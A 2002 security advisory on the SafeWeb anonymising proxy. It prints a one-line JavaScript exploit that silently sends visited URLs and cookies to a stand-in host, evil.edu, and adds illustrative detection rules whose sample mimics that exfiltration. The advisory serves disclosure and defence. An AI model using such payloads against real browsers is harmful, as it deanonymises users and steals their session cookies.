[NEWS] Deanonymizing SafeWeb Users

From: support@securiteam.com
Date: 02/14/02


From: support@securiteam.com
To: list@securiteam.com
Date: Thu, 14 Feb 2002 18:37:11 +0100 (CET)

The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com

  Deanonymizing SafeWeb Users
------------------------------------------------------------------------

SUMMARY

Although SafeWeb's Web anonymizing service has been shut down since
December, they claimed it was the "most widely used online privacy service
in the world". SafeWeb licensed their technology to PrivaSec, who is
currently running the technology in a preview program for a planned
subscription service. They also licensed it to the CIA.

A technical report detailing SafeWeb's catastrophic failures under the
simplest of JavaScript attacks by Web sites or firewalls (e.g., by
redirecting to a page containing the exploit) has been published; a link
is provided below.

DETAILS

An example (really one long line):
self['window']['top'].frames[0]['cookie_munch'] = Function('i=new Image(1,1);i.s'+'rc="https://evil.edu/"+top.frames[0].document.forms["fugulocation"].URL_text.value+(new Date()).getTime()+document.cookie;');

This is spyware. Any Web page containing this JavaScript makes the SafeWeb
browser silently report every URL visited to the attacker at evil.edu,
along with a copy of all of the persistent cookies previously established
through SafeWeb. It works regardless of the user's security settings
(recommended vs. paranoid mode, etc.). This attack is the only one the
authors describe that depends on the browser: it works in Netscape 6.x and
probably previous versions, but not IE. There are other attacks that do
the same thing and work in IE too, but they are a bit longer. Since the
attacks are just JavaScript, they probably do not depend on the OS of the
victim.
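
The snippet above never contains the literal text ".src" or "window.top", so a check that matches names in script text would pass it. The following JavaScript is an added example, not code from the advisory, the report or SafeWeb: it compares a hypothetical literal blocklist with a reject-by-default check on the shape of a script that a same-origin rewriting proxy is about to serve. The rule set, function names and sample strings are constructed for illustration.

```javascript
// Added example: conservative checks for script text passing through a
// rewriting proxy that serves every site from one origin.
// These are heuristic regexes, not a JavaScript parser.
const RULES = [
  // Code built from strings at run time cannot be inspected statically.
  { id: "dynamic-code", re: /\b(?:Function|eval)\s*\(|\bset(?:Timeout|Interval)\s*\(\s*["']/ },
  // obj['name'] reaches the same property as obj.name without spelling it out.
  { id: "computed-member", re: /\[\s*(["'])[A-Za-z_$][\w$]*\1\s*\]/ },
  // 's'+'rc' style concatenation can assemble an identifier piecewise.
  { id: "split-string", re: /(["'])\s*\+\s*(["'])/ },
  // Reaching out of the content frame into the proxy's own frames.
  { id: "frame-traversal", re: /\b(?:top|parent|frames|opener)\b/ },
  { id: "cookie-read", re: /\bdocument\s*\.\s*cookie\b/ },
];

// Hypothetical literal blocklist, standing in for name-matching sanitisers.
const LITERAL_BLOCKLIST = [".src", "window.top", ".location"];

function literalBlocklistHits(script) {
  return LITERAL_BLOCKLIST.filter((needle) => script.includes(needle));
}

function policyFindings(script) {
  return RULES.filter((rule) => rule.re.test(script)).map((rule) => rule.id);
}

function verdict(script) {
  const findings = policyFindings(script);
  return { allow: findings.length === 0, findings };
}

// Constructed samples. SUSPECT mirrors the syntactic shape of the snippet
// above with a placeholder host; BENIGN is ordinary page script.
const SUSPECT =
  "self['window']['top'].frames[0]['hook'] = Function('i=new Image(1,1);" +
  "i.s'+'rc=\"https://collector.example/\"+document.cookie;');";
const BENIGN = 'var logo = document.getElementById("logo"); logo.alt = "Home";';

console.log("blocklist hits:", literalBlocklistHits(SUSPECT));
console.log("policy verdict:", verdict(SUSPECT));
console.log("benign verdict:", verdict(BENIGN));
```

The split-string and frame-traversal rules will also flag some legitimate scripts; that false-positive cost is the price of a reject-by-default policy when all proxied content shares one origin.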

Using the SafeWeb privacy service helps keep user identities out of
routinely gathered log files, but it creates serious new risks for anyone
an adversary might bother to actually target. You have to wonder whether
this is a good tradeoff. After all, in the absence of serious bugs, Web
browsers generally prevent Web sites from silently depositing spyware or
collecting all of the user's cookies. One thing is clear: most users in
the intended market for this system had no idea that this system brought
any risks with it.

Vendor status:
The authors have been in touch with SafeWeb since October and with
PrivaSec for about a month now. Some related problems in SafeWeb involving
JavaScript spilling IP addresses have been noted here (by Alexander
Yezhov) and in alt.privacy.anon-server (by Paul Rubin). This paper adds
spyware, cookie snarfing, and the essential equivalence between SafeWeb's
"paranoid" and "recommended" modes of operation to the list of problems
with SafeWeb's technology.

ADDITIONAL INFORMATION

For the full report (23 pages, PDF):
 <http://www.cs.bu.edu/techreports/pdf/2002-003-deanonymizing-safeweb.pdf>

The information has been provided by David Martin <dm@cs.bu.edu>
and Andrew Schulman.
